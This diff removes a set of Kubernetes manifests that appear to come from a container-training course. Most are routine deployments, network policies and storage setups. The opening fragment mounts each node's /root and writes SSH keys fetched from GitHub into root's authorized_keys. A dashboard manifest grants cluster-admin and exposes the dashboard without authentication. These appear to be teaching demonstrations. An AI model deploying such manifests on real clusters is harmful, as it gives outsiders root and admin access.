hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "apk update && apk add curl && curl https://github.com/bridgetkromhout.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,18 +0,0 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
frontend the-frontend
bind *:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check

View File

@@ -1,16 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: haproxy
spec:
volumes:
- name: config
configMap:
name: haproxy
containers:
- name: haproxy
image: haproxy
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/

View File

@@ -1,14 +0,0 @@
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: cheddar
spec:
rules:
- host: cheddar.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: cheddar
servicePort: 80

View File

@@ -1,220 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

View File

@@ -1,10 +0,0 @@
apiVersion: v1
Kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx

View File

@@ -1,29 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: kaniko-build
spec:
initContainers:
- name: git-clone
image: alpine
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
git clone git://github.com/jpetazzo/container.training /workspace
volumeMounts:
- name: workspace
mountPath: /workspace
containers:
- name: build-image
image: gcr.io/kaniko-project/executor:latest
args:
- "--context=/workspace/dockercoins/rng"
- "--insecure"
- "--destination=registry:5000/rng-kaniko:latest"
volumeMounts:
- name: workspace
mountPath: /workspace
volumes:
- name: workspace

View File

@@ -1,167 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard

View File

@@ -1,110 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
namespace: local-path-storage
rules:
- apiGroups: [""]
resources: ["nodes", "persistentvolumeclaims"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["endpoints", "persistentvolumes", "pods"]
verbs: ["*"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
namespace: local-path-storage
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: local-path-provisioner
namespace: local-path-storage
spec:
replicas: 1
selector:
matchLabels:
app: local-path-provisioner
template:
metadata:
labels:
app: local-path-provisioner
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.8
imagePullPolicy: Always
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
name: local-path-config
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}

View File

@@ -1,138 +0,0 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: system:aggregated-metrics-reader
labels:
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: metrics-server
namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
spec:
serviceAccountName: metrics-server
volumes:
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
kubernetes.io/name: "Metrics-server"
spec:
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system

View File

@@ -1,14 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-testcurl-for-testweb
spec:
podSelector:
matchLabels:
app: testweb
ingress:
- from:
- podSelector:
matchLabels:
run: testcurl

View File

@@ -1,10 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-all-for-testweb
spec:
podSelector:
matchLabels:
app: testweb
ingress: []

View File

@@ -1,22 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: webui
ingress:
- from: []

View File

@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-volume
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
- name: git
image: alpine
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure

View File

@@ -1,95 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [ "" ]
resources: [ pods ]
verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,580 +0,0 @@
# SOURCE: https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true
apiVersion: v1
kind: ConfigMap
metadata:
name: stork-config
namespace: kube-system
data:
policy.cfg: |-
{
"kind": "Policy",
"apiVersion": "v1",
"extenders": [
{
"urlPrefix": "http://stork-service.kube-system.svc:8099",
"apiVersion": "v1beta1",
"filterVerb": "filter",
"prioritizeVerb": "prioritize",
"weight": 5,
"enableHttps": false,
"nodeCacheCapable": false
}
]
}
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: stork-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "delete"]
- apiGroups: [""]
resources: ["persistentvolumes"]
verbs: ["get", "list", "watch", "create", "delete"]
- apiGroups: [""]
resources: ["persistentvolumeclaims"]
verbs: ["get", "list", "watch", "update"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["events"]
verbs: ["list", "watch", "create", "update", "patch"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "list", "watch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
resources: ["volumesnapshots"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
resources: ["volumesnapshotdatas"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "create", "update"]
- apiGroups: [""]
resources: ["services"]
verbs: ["get"]
- apiGroups: [""]
resources: ["nodes"]
verbs: ["get", "list", "watch"]
- apiGroups: ["*"]
resources: ["deployments", "deployments/extensions"]
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
- apiGroups: ["*"]
resources: ["statefulsets", "statefulsets/extensions"]
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-role-binding
subjects:
- kind: ServiceAccount
name: stork-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: stork-role
apiGroup: rbac.authorization.k8s.io
---
kind: Service
apiVersion: v1
metadata:
name: stork-service
namespace: kube-system
spec:
selector:
name: stork
ports:
- protocol: TCP
port: 8099
targetPort: 8099
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ""
labels:
tier: control-plane
name: stork
namespace: kube-system
spec:
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
replicas: 3
template:
metadata:
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ""
labels:
name: stork
tier: control-plane
spec:
containers:
- command:
- /stork
- --driver=pxd
- --verbose
- --leader-elect=true
- --health-monitor-interval=120
imagePullPolicy: Always
image: openstorage/stork:1.1.3
resources:
requests:
cpu: '0.1'
name: stork
hostPID: false
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "name"
operator: In
values:
- stork
topologyKey: "kubernetes.io/hostname"
serviceAccountName: stork-account
---
kind: StorageClass
apiVersion: storage.k8s.io/v1
metadata:
name: stork-snapshot-sc
provisioner: stork-snapshot
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: stork-scheduler-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-scheduler-role
rules:
- apiGroups: [""]
resources: ["endpoints"]
verbs: ["get", "update"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch", "update"]
- apiGroups: [""]
resources: ["endpoints"]
verbs: ["create"]
- apiGroups: [""]
resourceNames: ["kube-scheduler"]
resources: ["endpoints"]
verbs: ["delete", "get", "patch", "update"]
- apiGroups: [""]
resources: ["nodes"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["delete", "get", "list", "watch"]
- apiGroups: [""]
resources: ["bindings", "pods/binding"]
verbs: ["create"]
- apiGroups: [""]
resources: ["pods/status"]
verbs: ["patch", "update"]
- apiGroups: [""]
resources: ["replicationcontrollers", "services"]
verbs: ["get", "list", "watch"]
- apiGroups: ["app", "extensions"]
resources: ["replicasets"]
verbs: ["get", "list", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets"]
verbs: ["get", "list", "watch"]
- apiGroups: ["policy"]
resources: ["poddisruptionbudgets"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["persistentvolumeclaims", "persistentvolumes"]
verbs: ["get", "list", "watch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-scheduler-role-binding
subjects:
- kind: ServiceAccount
name: stork-scheduler-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: stork-scheduler-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: apps/v1beta1
kind: Deployment
metadata:
labels:
component: scheduler
tier: control-plane
name: stork-scheduler
name: stork-scheduler
namespace: kube-system
spec:
replicas: 3
template:
metadata:
labels:
component: scheduler
tier: control-plane
name: stork-scheduler
spec:
containers:
- command:
- /usr/local/bin/kube-scheduler
- --address=0.0.0.0
- --leader-elect=true
- --scheduler-name=stork
- --policy-configmap=stork-config
- --policy-configmap-namespace=kube-system
- --lock-object-name=stork-scheduler
image: gcr.io/google_containers/kube-scheduler-amd64:v1.11.2
livenessProbe:
httpGet:
path: /healthz
port: 10251
initialDelaySeconds: 15
name: stork-scheduler
readinessProbe:
httpGet:
path: /healthz
port: 10251
resources:
requests:
cpu: '0.1'
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "name"
operator: In
values:
- stork-scheduler
topologyKey: "kubernetes.io/hostname"
hostPID: false
serviceAccountName: stork-scheduler-account
---
kind: Service
apiVersion: v1
metadata:
name: portworx-service
namespace: kube-system
labels:
name: portworx
spec:
selector:
name: portworx
ports:
- name: px-api
protocol: TCP
port: 9001
targetPort: 9001
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: px-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-get-put-list-role
rules:
- apiGroups: [""]
resources: ["nodes"]
verbs: ["watch", "get", "update", "list"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["delete", "get", "list"]
- apiGroups: [""]
resources: ["persistentvolumeclaims", "persistentvolumes"]
verbs: ["get", "list"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "list", "update", "create"]
- apiGroups: ["extensions"]
resources: ["podsecuritypolicies"]
resourceNames: ["privileged"]
verbs: ["use"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-role-binding
subjects:
- kind: ServiceAccount
name: px-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: node-get-put-list-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Namespace
metadata:
name: portworx
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-role
namespace: portworx
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "create", "update", "patch"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-role-binding
namespace: portworx
subjects:
- kind: ServiceAccount
name: px-account
namespace: kube-system
roleRef:
kind: Role
name: px-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: portworx
namespace: kube-system
annotations:
portworx.com/install-source: "https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true"
spec:
minReadySeconds: 0
updateStrategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 1
template:
metadata:
labels:
name: portworx
spec:
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: px/enabled
operator: NotIn
values:
- "false"
- key: node-role.kubernetes.io/master
operator: DoesNotExist
hostNetwork: true
hostPID: false
containers:
- name: portworx
image: portworx/oci-monitor:1.4.2.2
imagePullPolicy: Always
args:
["-c", "px-workshop", "-s", "/dev/loop4", "-b",
"-x", "kubernetes"]
env:
- name: "PX_TEMPLATE_VERSION"
value: "v4"
livenessProbe:
periodSeconds: 30
initialDelaySeconds: 840 # allow image pull in slow networks
httpGet:
host: 127.0.0.1
path: /status
port: 9001
readinessProbe:
periodSeconds: 10
httpGet:
host: 127.0.0.1
path: /health
port: 9015
terminationMessagePath: "/tmp/px-termination-log"
securityContext:
privileged: true
volumeMounts:
- name: dockersock
mountPath: /var/run/docker.sock
- name: etcpwx
mountPath: /etc/pwx
- name: optpwx
mountPath: /opt/pwx
- name: proc1nsmount
mountPath: /host_proc/1/ns
- name: sysdmount
mountPath: /etc/systemd/system
- name: diagsdump
mountPath: /var/cores
- name: journalmount1
mountPath: /var/run/log
readOnly: true
- name: journalmount2
mountPath: /var/log
readOnly: true
- name: dbusmount
mountPath: /var/run/dbus
restartPolicy: Always
serviceAccountName: px-account
volumes:
- name: dockersock
hostPath:
path: /var/run/docker.sock
- name: etcpwx
hostPath:
path: /etc/pwx
- name: optpwx
hostPath:
path: /opt/pwx
- name: proc1nsmount
hostPath:
path: /proc/1/ns
- name: sysdmount
hostPath:
path: /etc/systemd/system
- name: diagsdump
hostPath:
path: /var/cores
- name: journalmount1
hostPath:
path: /var/run/log
- name: journalmount2
hostPath:
path: /var/log
- name: dbusmount
hostPath:
path: /var/run/dbus
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: px-lh-account
namespace: kube-system
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-lh-role
namespace: kube-system
rules:
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "create", "update"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-lh-role-binding
namespace: kube-system
subjects:
- kind: ServiceAccount
name: px-lh-account
namespace: kube-system
roleRef:
kind: Role
name: px-lh-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Service
metadata:
name: px-lighthouse
namespace: kube-system
labels:
tier: px-web-console
spec:
type: NodePort
ports:
- name: http
port: 80
nodePort: 32678
- name: https
port: 443
nodePort: 32679
selector:
tier: px-web-console
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: px-lighthouse
namespace: kube-system
labels:
tier: px-web-console
spec:
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
tier: px-web-console
replicas: 1
template:
metadata:
labels:
tier: px-web-console
spec:
initContainers:
- name: config-init
image: portworx/lh-config-sync:0.2
imagePullPolicy: Always
args:
- "init"
volumeMounts:
- name: config
mountPath: /config/lh
containers:
- name: px-lighthouse
image: portworx/px-lighthouse:1.5.0
imagePullPolicy: Always
ports:
- containerPort: 80
- containerPort: 443
volumeMounts:
- name: config
mountPath: /config/lh
- name: config-sync
image: portworx/lh-config-sync:0.2
imagePullPolicy: Always
args:
- "sync"
volumeMounts:
- name: config
mountPath: /config/lh
serviceAccountName: px-lh-account
volumes:
- name: config
emptyDir: {}

View File

@@ -1,30 +0,0 @@
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: postgres
spec:
selector:
matchLabels:
app: postgres
serviceName: postgres
template:
metadata:
labels:
app: postgres
spec:
